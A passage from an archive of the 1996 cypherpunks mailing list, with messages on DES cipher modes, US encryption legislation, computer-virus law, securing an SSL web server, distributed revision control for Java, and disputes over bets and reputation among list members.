derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 24 Apr 1996 00:49:40 +0800
To: Rich Burroughs <richieb@teleport.com>
Subject: [NOISE]Re: E-mail harassment by c2
In-Reply-To: <2.2.32.19960421013859.006a6538@mail.teleport.com>
Message-ID: <Pine.BSF.3.91.960423075758.10503B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



OTOH, maybe he's trying to declare himself a candidate :)

This is turning into some sort of a weird ponzi scheme - we'll all wind 
up on "clueless" by virtue of belonging to other lists which have been 
subscribed to clueless which ...

Please attach your name to the bottom of the list, and subscribe your 
list to clueless ...

eventually, the entire 'net will be clueless ... (insert favorite 
aol-bash here) ;)

----------------------------------------
Rabid Wombat
wombat@mcfeely.bsfs.org
----------------------------------------

On Sat, 20 Apr 1996, Rich Burroughs wrote:

> I think you're missing what happened.
> 
> Someone subscribed the address for the _cypherpunks_ list to the clueless
> list.  The "welcome to clueless" message got sent to you via the cypherpunks
> list.  Notice the instructions from C2 say:
> 
> >If you ever want to remove yourself from this mailing list, 
> >you can send mail to "Majordomo@c2.org" with the following command 
> >in the body of your email message: 
> > 
> >unsubscribe clueless cypherpunks@toad.com 
> 
> The email address there is the cypherpunks list, not yours.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 24 Apr 1996 01:53:40 +0800
To: cypherpunks@toad.com
Subject: RSA Day in Washington
Message-ID: <199604231313.GAA12863@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Anyone else on the list going to be at RSA Day in DC this Thursday?

It might be fun to get together for lunch, or dinner Wednesday night.

More info at: http://www.rsa.com/EVENTS/washdc.html

Peter Trei
trei@process.com


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Tue, 23 Apr 1996 12:49:48 +0800
To: "Karl A. Siil" <karl@geoplex.com>
Subject: Re: DES as a stream cipher
In-Reply-To: <2.2.32.19960422214547.006b636c@geoplex.com>
Message-ID: <Pine.SOL.3.91.960423093853.1018F-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 22 Apr 1996, Karl A. Siil wrote:
> As this sounds like a previously solved problem, I wanted to find out about
> using DES (or any block cipher) as a stream cipher, i.e., in a manner that
> keeps input and output data length equal. I don't want to use a true stream
> cipher, as I want to use the same key for multiple messages and stream
> ciphers tend to place the bulk of their overhead in the re-key. Since stream
> ciphers have "memory," I would have to "re-key" to the same key for each of
> my messages. I would rather key something like DES once and run it in CBC
> mode or use some other form of IV.

Have a look at cipher feed back mode.  I have functions I call cfb64 in 
my DES library that give a 'single' character interface to cfb mode DES 
using 64bit feedback.

This should be what you want.  I also have a triple DES version of cfb64.
In my SSL library also has cfb64 mode for IDEA.

eric

ftp://ftp/pub/Crypto/DES
ftp://ftp/pub/Crypto/SSL
http://www.psy.uq.oz.au/~ftp/Crypto
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 24 Apr 1996 02:51:19 +0800
To: cypherpunks@toad.com
Subject: EYE_suk
Message-ID: <199604231401.KAA10892@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   4-22-96. WaPo:

   "Counter-Terrorism to Be Olympic Event for-U.S."

      Federal authorities are taking precautions against the
      use of unconventional weaponry such as poison gas, germ
      weapons or even a nuclear device. Those attending the
      Games will see only a small portion of the immense
      security operation. At its heart will be an estmated
      3,000 Army troops, 6,300 National Guardsmen, and at
      least 10,000 other police and private security guards at
      peak strength, with an additional force of agents from
      the FBI, ATF, DIA, CIA, NSA and FEMA.

      The Pentagon's office of special operations and
      low-intensity conflict plans to place its elite counter-
      terrorism teams in readiness. "We keep telling everybody
      we wil be armed with a radio and a smile," said Maj.
      Gen. Robert R. Hicks Jr.

   EYE_suk  (A scary skinhead rumble for I-MAX gouge)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Date: Wed, 24 Apr 1996 02:08:03 +0800
To: cypherpunks@toad.com
Subject: Re: DES as a stream cipher
Message-ID: <9604231709.AA0869@>
MIME-Version: 1.0
Content-Type: text/plain


The easiest approach (for one thing, easiest to analyze
as far as security issues goes) is counter mode.  See
Scheier, Applied Crypto, second edition, section 9.9.

 paul

!-----------------------------------------------------------------------
! Paul Koning, NI1D, C-24183
! 3Com Corporation, 1-3A, 118 Turnpike Road, Southborough MA 01772 USA
! phone: +1 508 229 1695, fax: +1 508 490 5873
! email: paul_koning@isd.3com.com  or  paul_koning@3mail.3com.com
! Pgp:   27 81 A9 73 A6 0B B3 BE 18 A3 BF DD 1A 59 51 75
!-----------------------------------------------------------------------
! "Be wary of strong drink.  It can make you shoot at tax collectors
!  -- and miss!"
!                -- Robert A. Heinlein, "The Notebooks of Lazarus Long"
!                   in "Time Enough for Love"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 24 Apr 1996 06:17:32 +0800
To: Steve Reid <brucem@wichita.fn.net>
Subject: Re: Bernstein ruling meets the virus law
Message-ID: <199604231714.KAA14970@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  2:43 PM 4/22/96 -0700, Steve Reid wrote:
>Things are only black and white in lawmaker's dreams. :-/

Note also that there are programs which replicate and maintain themselves
on several machines in a network in order to provide reliable network
services (e.g. print spooling).  (The people at Xerox PARC, who did almost
everything first, experimented with this kind of program.)

If lawmakers are to come up with a rational law, a big if, they will have
to differentiate between a bug in a "tame" worm which lets it get loose as
a virus, and a virus which was meant to be destructive from the get go. 
And then they will have to decide what to do about the virus that was
designed to write, "Hi Mom!" on as many screens as possible with no
malicious damage, and bugs in it.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rbersten@ia.com.au (Rosanne Bersten)
Date: Tue, 23 Apr 1996 16:27:40 +0800
To: "Sentiono Leowinata" <cypherpunks@toad.com
Subject: Re: OFF Topic: MS-Exchange bug (winmail.dat)
Message-ID: <v01540a05ada1d5ce96fd@[203.8.88.46]>
MIME-Version: 1.0
Content-Type: text/plain


I don't believe you, the recipient, can do anything. But your friend the
sender can..

To get rid of the dumb info Exchange sends out in WINMAIL.DAT to
non-exchange mail clients, select Address Book from the Tools menu. Add
every single Internet address you know of which is a) a mailing list or b)
someone who doesn't use exchange. Double click on each address individually
and Click on the tab "SMTP - Internet". Uncheck the "Always send messages
in Microsoft Exchange Rich Text Format" for *each* *address*
*individually*.

Are we having fun yet?

Apparently, for a 38 word msg, with one word in colour and one in a
different font, exchange sends out a 1514 character file to describe it.

cya,

r

*-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-*
+ Rosanne Bersten (editor@ia.com.au) - Editor, internet.au magazine +
+  tel: +61 2 310 1433 * fax: +61 2 310 1315 * http://www.ia.com.au +
*-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-*






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 24 Apr 1996 07:14:38 +0800
To: jamesd@echeque.com
Subject: Re: 5th protect password?
Message-ID: <2.2.32.19960423181823.006b2c0c@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

At 07:58 AM 4/23/96 -0700, James Donald wrote:

>Yeah:  fifty thousand dollars.  
>Not that it makes the slightest difference.
>
>On the extropians list a number of very large bets were made and 
>accepted, but nobody ever paid up. (Or very few -- I know of no
>cases.)

As much as I like the Extropians, personally, they haven't
got a clue how to implement practical social systems.  It
is trivial to set up a wagering system that works--and you
don't need all the "polycentric" blah blah.

>Now if Unicorn had proposed a bet for one hundred dollars, then
>I would sit up and take notice.  A hundred dollars is real money.  
>Fifty thousand dollars is hot air...

a)  I proposed that a bet of $100 which Jim Bell ignored.
    That should have made you sit up and take notice.
b)  Unicorn has the 50Gs and I'm confident he would have 
    paid up if necessary.

>...  Anybody who was serious about paying
>would not make such ridiculous bets.

This is a non-sequitor.  Anyone serious about winning
WOULD make such a bet.  Do you really think that a legal
scholar as good as Unicorn would just shoot from the hip
without knowing he had it in the bag?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Wed, 24 Apr 1996 06:14:51 +0800
To: karl@geoplex.com
Subject: Re: DES as a stream cipher
Message-ID: <199604231630.LAA14179@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


karl@geoplex.com ("Karl A. Siil") asks:

>As this sounds like a previously solved problem, I wanted to find out about
>using DES (or any block cipher) as a stream cipher, i.e., in a manner that
>keeps input and output data length equal. I don't want to use a true stream
>cipher, as I want to use the same key for multiple messages and stream
>ciphers tend to place the bulk of their overhead in the re-key. Since stream
>ciphers have "memory," I would have to "re-key" to the same key for each of
>my messages. I would rather key something like DES once and run it in CBC
>mode or use some other form of IV.

The right answer depends on the types of attacks you're interested in
countering. The classic reference is probably Voydock and Kent's
"Security Mechanisms in High Level Network Protocols," from Computing
Surveys in 1983. I think Stallings recently put together collection of
paper reprints for IEEE Press that included this one.

This paper is particularly nice since they present various streaming
modes and then talk about the vulnerabilities associated with them.
So it's not crypto algorithms so much as how to use them.

Rick.
smith@sctc.com        secure computing corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 24 Apr 1996 08:04:36 +0800
To: cypherpunks@toad.com
Subject: Support for crypto bills is building
Message-ID: <199604231831.LAA20028@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[From FARNET's Washington Update. This is interesting principally for the 
note about the number of co-sponsors.]

SEN. BURNS' ENCRYPTION BILL TO BE INTRODUCED BY END OF NEXT WEEK

The third encryption bill aimed at blowing the administration's key-escrow
policy out of the water is set for introduction probably late next week.
Sen. Conrad Burns (R-MT) will introduce a bill that is similar to both the
Leahy and Goodlatte bills already in the Senate and House, respectively.
Both prohibit a mandatory key-escrow system for the use of encryption in
the United States.  Both also significantly lift export restrictions on
encryption software and hardware.  (Export approval would be granted for
any bit length that is already generally available in foreign markets.
Current policy restricts the export of  encryption hardware or software
products with keys greater than 40 bits long.)

Hill staff said yesterday that they saw strong support for the encryption
bills forming in both houses.  Thirty-eight co-sponsors have signed on to
the Goodlatte bill in the House so far.  The Burns bill is expected to
garner the support of Sen. Leahy who also has a bill in the Senate.

The House bill has been referred to the Judiciary committee and may be also
referred to the House Committee on International Relations.  The Senate
expects to hold hearings in the Senate Commerce Committee sometime in June.
While proponents are working to get the bill(s) passed this year, because
of the elections this fall, it will be a tight schedule.  Furthermore, the
bills' supporters are trying to keep the three pieces of legislation from
being referred to any of the intelligence or law enforcement committees
where some of the strongest opposition is likely to arise.

Strong encryption is generally regarded as extremely important to the
success of electronic communications.  The Clinton administration's various
proposals for strict export restrictions and a mandatory key-escrow system
have met with significant opposition from industry, privacy groups and
netizens alike.  Just this week, a court in California ruled that "source
code" for encryption programs is speech, and therefore protected under the
First Amendment.  The case came at the instigation of a programmer who was
forbidden to place his source code for an encryption program that he had
developed on the Internet in order to get discussion on its merits from his
colleagues.  The ruling was just a preliminary step in order to continue
with the case.  It could, however, clear the way for the overruling of
export restrictions on encryption source code.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 24 Apr 1996 06:16:55 +0800
To: llurch@networking.stanford.edu
Subject: Re: [NOISE] Re: Nazis on the Net
Message-ID: <01I3VQJGR4JK8Y4Y01@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: Rich Graves <llurch@networking.stanford.edu>

>E. Allen Smith actually might have written:

>>I've seen various quotes from Randy Weaver in various publications,
>>including Time and other non-right-wing ones. None of them indicated him
>>as an actual neo-Nazi or racist

>BWAHAHAHA!!!

	I assume that you are thinking I'm incorrect? Incidentally, I classify
a racist as someone who says "this race is evil and should be
killed/enslaved/tortured/whatever." Someone who says that different races
shouldn't live together is a separatist; it's only when they start having
seperate but equal being anything but equal (e.g., apartheid) that it crosses
the line into racism. Thus, I don't regard Charles Murray or Richard
Herrnstein as racist, for instance.

>Here's a URL for a *highly sympathetic* piece on Weaver that complains
>that, "I will be happier when the press stops demonizing Weaver -- in
>subtle and not so subtle ways -- in news stories and editorials. He is
>referred to so consistently as "White Separatist Randall Weaver" that one
>would be forgiven for assuming that his parents gave him the first name
>"White,"  while "Separatist" was some old family name handed down from his
>maternal aunt":

>http://www.omnet.com/What-I-Think/col.09-01-95B.html

	Yes, it doesn't give any information to call him a racist... it gives
information to call him a separatist. I don't support either, but I call the
former more evil than the latter. If you thought I had claimed that Weaver
wasn't a separatist, you've misread me.

>Here are some *highly sympathetic* URLs that mention that Weaver was a
>white separatist/Aryan Nations wacko:

>http://www.scimitar.com/revolution/by_topic/firearms/enforce/rubyridge/setup.html
>http://eagle.tamu.edu/~carlp/Liberty/Weaver.Case.AR.html

	They both, yes, state that he was a white separatist. They don't
state that he was an Aryan Nations member... just that the FBI was trying to
use him to infiltrate the Aryan Nations. One doesn't have to be a member of
something before recruitment by an undercover (or intelligence) operation to
be useful for infiltrating it - you just have to be someone that that
organization would accept. As a known white separatist, Weaver becoming an
out-and-out racist would be more believable than, say, you or me becoming an
out-and-out racist. Often, those who are already members of such an
organization will be more resistant to turning - more emotional committment,
more watchfullness for attempts to frame/entrap, etcetera.

>A slightly more balanced piece from the New York Times:

>http://eagle.tamu.edu/~carlp/Liberty/Weaver.Case.NYT.html

	Which, again, doesn't give any evidence that he was an actual racist,
as opposed to a white separatist.

>FWIW, the Anti-Defamation League, which I am *well aware* has said sily
>things about militias and skinheads in the past, mentions Weaver in this
>report:

>http://www.almanac.bc.ca/cgi-bin/ftp.pl?people/w/weaver.randy/aryan-nations

	I'm glad you mentioned their unreliability; otherwise I would have
had to. This one I haven't been able to check (connection refused), but I
wouldn't believe them in any case if they did claim he was a racist.

>I have also heard Weaver cited quite favorably on the Stormfront list,
>which has repudiated Timothy McVeigh because his friend Terry Nichols has
>a Filipino wife. This makes McVeigh a Race Traitor by association, of
>course.

	Well, yes, a martyr is quite helpful to most movements. Of course
he's going to be cited favorably, so long as they can't find any ideological
problems such as the one you mention with regards to Terry Nichols and
Timothy McVeigh.
	Thank you, you've done my research for me.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 24 Apr 1996 06:26:40 +0800
To: cypherpunks@toad.com
Subject: [Flatulence] Re: EYE_suk
Message-ID: <v03006601ada2bd05dd54@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



Is it just me, or is this sentence funny?


>    Underscoring the high-level attention the problem is
>    getting, the field exercise last week included Deputy
>    Attorney General Jamie S. Gorelick and other senior
>    officials in Washington, with Gore's staff getting a daily
>    briefing.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 24 Apr 1996 11:54:52 +0800
To: cypherpunks@toad.com
Subject: Java, distributed OO revision control
Message-ID: <199604232022.NAA10094@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



in some earlier essays posted here I have been exploring some of the 
ramifications of Java and the distributed computing model it gives
rise to, suggesting that many new standards are on their way to
deal with the unique associated programming complexities. 
here are some more thoughts along this line.

Java clearly was designed to allow the integration of 
objects located anywhere in cyberspace, although this is not yet
realized in widespread practice. even as part of the basic 
standard it proposes a naming hierarchy (i.e. object namespace)
that includes internet domain names.

the problem of distributed objects is somewhat interesting and I
believe will lead to many new advancements but also require many
sophisticated new practices on the internet. however, these are
the "same problems" that have been repeatedly encountered in the
past, just re-rearing their heads in a way that begs for systematic
treatment.

consider the problem of software that uses a lot of different 
components built by other people. I create a Widget X that uses
Gadget A,B,C, all of these being different pieces of code maintained
by other people somewhere on the net. each of these pieces of code
may go through revisions that make earlier conventions obsolete,
or worse yet, introduce unexpected bugs. this is a very basic
problem of software development whether you are within a company
or within cyberspace, but it is going to become far more prevalent
once distributed objects are in place. how can we deal with this
complexity?

==

one idea that occurs to me that would be very powerful in tackling
these problems would be a "distributed object oriented revision control 
system", DOORCS. many here are familiar with revision control systems that
work on program files. what I imagine is a RCS that allows individual
objects to be checked in and checked out, and keeps track of earlier
versions of objects. 

let's say then that I write my Widget X. I could "freeze" the versions
of the objects A,B,C that I want to use if each of these designers
was using the DOORCS-- they commit to keeping earlier versions of their
code in place so that my own code is stable. this is *not* the same
as me copying their code into my own directories, which is highly
undesirable from the point of view of development, because it forks
off the lines of geneology.

hence when my code runs, it names the version of the objects that it
is using over the network. so when people create new versions of objects,
my code is guaranteed stable.

all kinds of interesting embellishments on this system can be put in
place that might allow automation of software jobs and chores that take
a very long time in our current system, some of which I will describe.

imagine the problem of some code being revised, and the designer must
spend time integrating the new changes into his system. what I propose
would be that when people create objects, they also include an 
"intention" field that indicates things like:

1. how long this version is likely to stick around, if new versions 
are in the pipeline
2. how long this version will be kept around after new versions of
the object are created, i.e. "expiration date"
3. whether new versions is/are going to be backward compatible

this kind of information could be in fact applied on a method-per-method
basis. now imagine that I run a program associated with my Widget X
called "update". this program goes out into the object hierarchy and
notifies me of new versions of my objects that are in existence. it
might automatically adjust versions to new versions of the objects if
they are supposed to be "backward compatible". it could tell me things
like "so-and-so object that you are using is going to be replaced in
[x] days", or "so-and-so version was replaced with a newer version".

with this kind of information, combined in ingenious ways, I can actually
measure the overall "stability" of my program based on the "stability"
of all the parts. I can actually make design decisions about using
different objects "out there" that are likely to be more stable, if
that is my preference, or more "state-of-the-art" but buggy (the basic
tradeoff going on here).

now, here is where the fun can really begin. when all of these systems
are formalized and standardized, you can write software that automates
some of the very difficult tasks that many programmers face. I would
wager the majority of time spent in large programming tasks is 
dedicated to some basic problems:

1. regression testing. adding new components and making sure the 
"whole" still works when you add new parts (objects).

2. locating bad modules when a regression test fails.

imagine that these time consuming processes that take days of the
lives of programmers could be *automated*! that is precisely what I 
am proposing would be possible with a very good DOORCS. here's how it 
would work:

a person that creates an object also creates "assertions" or 
regression tests built into the object. these tests are run to make
sure they pass for some version of all the objects that this object
comprises. these assertions should be code that can be run with an
exit status of "code passed" or "code failed".

now, when new versions of the other objects are created, an automated
"packager" could test the new versions of code automatically, and also
isolate bad versions of the new objects that aren't backward compatible
or introduce new bugs (i.e. "regress"). the automated "tester" would
be similar to a binary search algorithm: it would start by adding
all new modules, and then running the regression tests. if it passes,
the new modules are considered trustworthy. if it fails, it can 
switch back and forth between previous and new versions of the modules,
rerunning the regression tests, and automatically find the bad modules
possibly very rapidly!! 

I claim that this is exactly what programmers
often spend many of the hours in their day doing, and an automated
means of doing this could possibly be quite revolutionary. furthermore,
adding the "distributed" aspects of associated with cyberspace, and
you have a sort of "holographic programming environment" in which
everyone on the Net effectively becomes a cooperative programmer
in the same company!!

==

now, consider some other interesting problems. often people have
different ideas about where they want code to "go" in the future.
a DOORCS system might actually track the geneology of a piece of
code, and allow anyone, not merely the original creator, to create
a new "branch" of development of any object on the net. viewed in
this way, we have a sort of "object commune" in which everyone
contributes what they want to the development of software, and it
simply moves in the directions that are decided by mass consensus.
you might have "breakings" and "mergings" as people diversify and
unify different algorithms. anyone can decide to use any version
of the object in the existing tree, or modify it accordingly.
in fact this creates a sort of "software breeding ground" in which
different objects are crossed, intermixed, and combined by programmers,
the trees or geneology of which are tracked by the DOORCS.

one concept to bring out in all this: what I am proposing is also
a hierarchical method of revision control in which the granularity
of control is very narrow, i.e. that of individual objects. it is
this granularity or resolution that allows all the neat tricks and
very streamlined version management. (today, most companies do 
RCS on the level of entire programs or files in those programs, which
would not fully support all of these capabilities I've delineated.)

in the view I am proposing, every piece of software is an "object"
composed of other "objects". these objects all have their own 
versions, and some fixed combination of these versions, plus additional
modifications can be named a unique version of the encompassing object.

also, I like the idea of every object having a "maintainer" or an
email address of where to send bug reports to. it seems that I am
eternally finding bugs in other people's software when I try to 
write my own software, and in some ways this is an impossible fate
to avoid (users invariably become bug finders). at least this way
I would have somewhere to complain to. an object might actually
store all of the bug reports or enhancements that have been sent to
it from the net, and when the maintainer goes to modify that object,
he can automatically call up all the associated comments! the maintainer
may even find that various enhancements have already been added to
his objects by others "out there" and he might take the task of
"authorizing" (i.e. integrating into his "official" version)
all the ones he finds most relevant and useful to his software.

note that some of the things I am proposing can be handled by
inheritance properties in language, and there is some similarity,
but I don't consider current concepts of inheritance in general 
the proper mechanism for dealing with revision control, although
it may be that new concepts of "inheritance" that combine it with
the above revision control ideas find their way into languages.

note also that I am very explicitly abandoning the idea that some
programmers have, "if someone's new software doesn't work, then they
should fix it, and not distribute buggy software". the whole concept
and premise here is that BUGGY SOFTWARE EXISTS and cannot necessarily
be detected by the PRODUCER of that software, and that a system ought
to be devised in which the CONSUMER can have total freedom over what
versions of the software he uses based on his own perceptions of its
value or bugginess. the more that bugs and program development are
seen as an inherent part of the process, the more beneficial the overall
system in my view.

==

(there will be many people who object to all this as fantasy 
based on MONEY. "who will pay for it??" ask the unimaginative. I don't
want to get into the economics of all this in this paper, only to
say that I did explore this in an earlier paper, where I said that
microcurrency combined with per-use-charges on objects could lead
to a very interesting "vending machine software environment".)

while all of these ideas may sound "pretty but unnecessary" at this
moment, I think they will be seen as increasingly critical when
distributed objects begin to catch hold on the Internet with the
Java paradigm. many programs such as Makefiles were invented for
the sole purpose of dealing with the associated complexity of
programming, not the programming itself, and I think this trend
will be continuing.

increasingly, programming environments are not merely going to
be programming languages, which is a very minor part of program
development, but entire systems for the development of code.
many programmers tend to oppose these new systems, insisting that
"I could do all that by hand in the old days". but they really will
save tremendous labor if done properly, and not
create new limitations and burdens but instead give new freedoms and 
options to the programmer, 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Wed, 24 Apr 1996 07:13:14 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: [NOISE]Re: E-mail harassment by c2
In-Reply-To: <Pine.BSF.3.91.960423075758.10503B-100000@mcfeely.bsfs.org>
Message-ID: <Pine.HPP.3.91.960423133022.21889C-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


Now *this* is an interesting denial of service attack on c2's site. (**) 
(**) Crypto relevance
On Tue, 23 Apr 1996, Rabid Wombat wrote:

> This is turning into some sort of a weird ponzi scheme - we'll all wind 
> up on "clueless" by virtue of belonging to other lists which have been 
> subscribed to clueless which ...
> 
> Please attach your name to the bottom of the list, and subscribe your 
> list to clueless ...
> 
> eventually, the entire 'net will be clueless ... (insert favorite 
> aol-bash here) ;)
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jon Leonard" <jleonard@divcom.umop-ap.com>
Date: Wed, 24 Apr 1996 10:34:14 +0800
To: cypherpunks@toad.com
Subject: Betting and reputations  Was: Re: Jim Bell, Apology to list.  Was: [Yadda Yadda Yadda]
In-Reply-To: <Pine.SUN.3.91.960421192206.9131E-100000@polaris.mindport.net>
Message-ID: <9604232037.AA21133@divcom.umop-ap.com>
MIME-Version: 1.0
Content-Type: text


It's an interesting vindication of the nym reputation model that no one
has questioned the meaning of Black Unicorn offering to bet $50,000, even
though (to the best of my knowlege) this is only backed by his writings,
not any sort of ecash account or reference to a True Name.

I noticed this in my reaction to seeing the $50,000 figure, and wondering
first about financial resources, and only then about the fact that there
really isn't any way to force payment by a nym.  Black Unicorn's writings
are convincing evidence that he'd pay a gambling debt.  (Not that I think
he'd lose this bet, but that's a separate issue.)

The other thing I noticed is that reputation capital isn't a simple economic
quantity:

Black Unicorn wrote: 
[snip]
> All this said, I find Mr. May's and Mr. Sandfort's criticism stinging.  Mr. 
> Bell, and my response to him, manages to sap a great deal of time and effort 
> from myself and others for no gain aside draining his (and to some extent my) reputation 
> capital.  These disputes serve little purpose otherwise.  It's clear to 
> me, if not everyone else, that Mr. Bell simply fabricates his positions, 
> evidence, and persuasion out of the mist.

I have to disagree about the effect on Black Unicorn's reputation capital.
My opinion of his legal skills and probable economic behavior are not
diminished by his argument with Jim Bell.  I have decided that he is more
likely to rant than I had previously thought, though.

The underlying model for reputation capital seems to be economics, but some
amount of psychology or economic anthropology is probably more appropriate.
We develop mental models of the behavior of others based on their actions.
Often more detail is required than the monetary amount required to make
someone untrustworthy.

The relevant question seems to be "Is this worth reading", judged on the
basis of prior writing.  My answer of "Yes, but if it's about Jim Bell,
then only maybe" can't be modeled as a single number.

Jon Leonard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Eckenwiler <eck@panix.com>
Date: Wed, 24 Apr 1996 11:31:15 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Bernstein ruling meets the virus law
In-Reply-To: <199604231714.KAA14970@netcom9.netcom.com>
Message-ID: <199604231749.NAA09020@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz sez:
+ 
+ If lawmakers are to come up with a rational law, a big if, they will have
+ to differentiate between a bug in a "tame" worm which lets it get loose as
+ a virus, and a virus which was meant to be destructive from the get go. 
+ And then they will have to decide what to do about the virus that was
+ designed to write, "Hi Mom!" on as many screens as possible with no
+ malicious damage, and bugs in it.

18 USC 1030(a)(5) makes such a distinction, treating intentional harm
more severely than releasing a virus "with reckless disregard of a
substantial and unjustifiable risk" of harm.  The latter is only a
misdemeanor; the former, a felony.

The statute didn't always make this distinction.  In fact, it was the
RTM case -- brought under the former felony-only version of the
statute -- that inspired the 1994 amendment dividing the offense into
two separate offenses.

-- 
	Wovon man nicht sprechen kann, darueber muss man schreiben.

                      Mark Eckenwiler   eck@panix.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 24 Apr 1996 10:20:37 +0800
To: umwalber@cc.UManitoba.CA
Subject: Re: ApacheSSL
Message-ID: <199604232059.NAA24322@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:50 PM 4/20/96 +0000, umwalber@cc.UManitoba.CA wrote:
>An ISP that I have ties with  is looking to set up a secure server.  
>Currently, they are running Apache.  I told them that for ~$500 they 
>can put on Apache SSL and be all ready.  However, they want to buy 
>Netscape (for the name, I've already given them the 40bit gospel), 
>put it on a separate, firewalled machine, allow no access to it, etc, 
>etc.  Is all this paranoia necessary?

If they're handling money, then, yes, the paranoia is probably necessary.
Aside from the 40-bit vs. 128-bit issue, one of the big security risks of SSL
and similar systems is that the server they run on is typically sitting right
out there on the Internet waiting for somebody to crack it, and keeping
credit card information on the same rather than handing the encrypted
information
across some secure interface (whether a firewall or dedicated RS232 or
whatever.)
A bulletproof 128-bit interface doesn't help if it's running on a cracked
machine.
Putting it on a separate firewalled machine is a Good Thing.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 24 Apr 1996 07:15:23 +0800
To: jamesd@echeque.com
Subject: Re: 5th protect password?
In-Reply-To: <199604231456.HAA06590@dns2.noc.best.net>
Message-ID: <Pine.SUN.3.93.960423135836.3588E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Apr 1996 jamesd@echeque.com wrote:

> At 06:19 AM 4/23/96 -0700, Sandy Sandfort wrote:

> > didn't Unicorn offer Mr. Bell a 
> > wager on this issue?  Isn't the ball in Mr. Bell's court to put
> > his money where his mouth is?
> 
> Yeah:  fifty thousand dollars.  

[...]

> Now if Unicorn had proposed a bet for one hundred dollars, then
> I would sit up and take notice.  A hundred dollars is real money.  

US$ 100.00 it is.  Mr. Bell?

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
